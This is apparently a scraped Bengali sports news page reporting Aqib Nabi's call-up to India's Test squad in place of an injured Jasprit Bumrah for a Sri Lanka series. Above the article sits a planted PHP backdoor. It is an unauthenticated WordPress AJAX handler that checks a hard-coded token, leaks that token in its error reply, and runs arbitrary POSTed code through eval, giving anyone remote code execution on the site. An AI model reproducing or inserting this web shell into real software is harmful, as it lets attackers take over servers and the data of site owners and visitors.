// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বুমরাহর বদলে ভারতের টেস্ট দলে জম্মু-কাশ্মীরের আকিব নবি | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeবুমরাহর বদলে ভারতের টেস্ট দলে জম্মু-কাশ্মীরের আকিব নবি

বুমরাহর বদলে ভারতের টেস্ট দলে জম্মু-কাশ্মীরের আকিব নবি

ভারতের ক্রিকেটে আবারও উঠে এলো নতুন এক নাম। দীর্ঘদিন ঘরোয়া ক্রিকেটে ধারাবাহিক পারফরম্যান্সের পুরস্কার পেলেন জম্মু-কাশ্মীরের পেসার আকিব নবি। জসপ্রিত বুমরাহর চোটের কারণে শ্রীলঙ্কার বিপক্ষে আসন্ন দুই টেস্টের সিরিজে ভারতের জাতীয় দলে প্রথমবারের মতো ডাক পেয়েছেন এই পেসার।

গত মাসে ইংল্যান্ডের বিপক্ষে ওয়ানডে সিরিজের সময় বাঁ হাঁটুতে চোট পেয়েছিলেন বুমরাহ। সেই চোট পুরোপুরি সেরে না ওঠায় শেষ পর্যন্ত শ্রীলঙ্কা সিরিজ থেকে তাকে বাইরে রাখার সিদ্ধান্ত নিয়েছে ভারতীয় ক্রিকেট বোর্ড। ইংল্যান্ডের বিপক্ষে সিরিজের তৃতীয় ও শেষ ওয়ানডেতেও খেলতে পারেননি ভারতের পেস আক্রমণের সবচেয়ে বড় অস্ত্র।

বুমরাহর জায়গায় সুযোগ পাওয়া আকিব নবির গল্পটাও কম অনুপ্রেরণার নয়। জম্মু-কাশ্মীরের ক্রিকেট থেকে ভারতের জাতীয় দলে জায়গা করে নেওয়া মাত্র তৃতীয় ক্রিকেটার তিনি। এর আগে পারভেজ রাসুল ও উমরান মালিক ভারতের হয়ে সাদা বলের ক্রিকেট খেলেছেন।

ঘরোয়া ক্রিকেটে অসাধারণ পারফরম্যান্স দিয়েই নির্বাচকদের নজরে এসেছেন আকিব। গত দুই মৌসুমে রঞ্জি ট্রফিতে তার শিকার ১০৪ উইকেট। এর মধ্যে ২০২৫-২৬ মৌসুমেই নিয়েছেন ৬০ উইকেট। জম্মু-কাশ্মীরের প্রথম রঞ্জি ট্রফি শিরোপা জয়ের পথেও গুরুত্বপূর্ণ ভূমিকা ছিল তার।

শুধু ঘরোয়া ক্রিকেট নয়, সম্প্রতি ভারত ‘এ’ দলের হয়ে শ্রীলঙ্কা সফরেও নিজের সামর্থ্যের প্রমাণ দিয়েছেন আকিব। দুই প্রথম শ্রেণির ম্যাচে নিয়েছেন ছয় উইকেট। সেই পারফরম্যান্সই শেষ পর্যন্ত তাকে জাতীয় দলের দরজায় পৌঁছে দেয়।

এবার সেই শ্রীলঙ্কার মাটিতেই ভারতের টেস্ট দলে অভিষেকের অপেক্ষায় আকিব। আগামী ১৫ আগস্ট গলে শুরু হবে দুই ম্যাচের সিরিজের প্রথম টেস্ট। দ্বিতীয় টেস্ট শুরু হবে ২৩ আগস্ট কলম্বোয়। বুমরাহর অনুপস্থিতিতে ভারতের পেস আক্রমণে মোহাম্মদ সিরাজ, প্রসিধ কৃষ্ণ, গুরনুর ব্রারদের সঙ্গে অকিবও থাকছেন।

শুরুতে অবশ্য ধারণা করা হয়েছিল, বাধ্যতামূলক ফিটনেস পরীক্ষায় উত্তীর্ণ হয়ে শ্রীলঙ্কার বিপক্ষে অন্তত একটি টেস্টে খেলতে পারবেন বুমরাহ। কিন্তু পরবর্তীতে তার বাঁ হাঁটুর ফোলা নিয়ে নতুন করে উদ্বেগ তৈরি হয়। পরিস্থিতি পর্যালোচনা করে ক্রীড়া বিজ্ঞান দলের পরামর্শ, এত দ্রুত তাকে টেস্ট ক্রিকেটে ফেরানো ঝুঁকিপূর্ণ হতে পারে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments